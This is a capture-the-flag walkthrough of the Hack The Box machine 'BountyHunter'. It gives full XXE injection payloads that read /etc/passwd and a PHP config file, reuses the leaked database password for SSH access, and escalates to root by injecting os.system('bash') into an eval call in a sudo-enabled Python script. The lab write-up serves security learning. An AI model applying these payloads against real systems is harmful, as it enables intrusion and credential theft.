BOUNTYHUNTER

Scanning

NMAP

➜  ~ nmap -T4 bountyhunter.htb 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-16 07:41 EDT
Nmap scan report for bountyhunter.htb (10.10.11.100)
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 22.44 seconds

fast scan to know open ports we know from box name it will be web base box

Enumeration

gobuster

gobuster dir -u http://bountyhunter.htb/ -w /usr/share/wordlist/dirbuster/directory-list-lowercase-2.3-medium.txt -x php
. . .
/db.php
/resources
. . .

port 80

home page

click portal ...

catch this form post request with Burpsuite

lets decode data parameter to understand what's going on

XML ... lets try XXE injection

Exploit

Payload

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
        <bugreport>
        <title>&xxe;</title>
        <cwe>xxxxxxx</cwe>
        <cvss>xxxxxxx</cvss>
        <reward>xxxxxxx</reward>
        </bugreport>

encode to Base64 then URL encoding

send payload

it works but wait ... will be back in second ...

after directory busting we found this directory

open README.txt

lets try to grab db.php file "gobuster output"

payload

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>
        <bugreport>
        <title>&xxe;</title>
        <cwe>xxxxxxx</cwe>
        <cvss>xxxxxxx</cvss>
        <reward>xxxxxxx</reward>
        </bugreport>

encode to Base64 then URL encoding

send payload ...

<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>

try to SSH admin user but it not working ...

lets try another user

burp output when we trigger /etc/passwd

the user development look interesting user with UID 1000 is probably the first user ever created on that particular system

try too SSH development user with m19RoAU0hP41A1sTsq6K password

it works ! ....

• USER SHELL ACCESS

Privilege Escalation

check sudo rights sudo -l

we can execute /opt/skytrain_inc/ticketValidator.py as root with no password

read to know what the script doing cat /opt/skytrain_inc/ticketValidator.py

#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()

we gonna build the payload based on these lines

if loc.endswith(".md"):
if not x.startswith("# Skytrain Inc"):
if not x.startswith("## Ticket to "):
if not x.startswith("**"):
            if int(ticketCode) % 7 == 4:
            ticketCode = x.replace("**", "").split("+")[0]
             if validationNumber > 100:
                    return TRUE

Payload

file name root.md

# Skytrain Inc
## Ticket to 
__Ticket Code:__
**11+101, __import__('os').system('bash')**

• ROOT SHELL ACCESS

Box creator include the Privilege Escalation payload in /tmp/test.md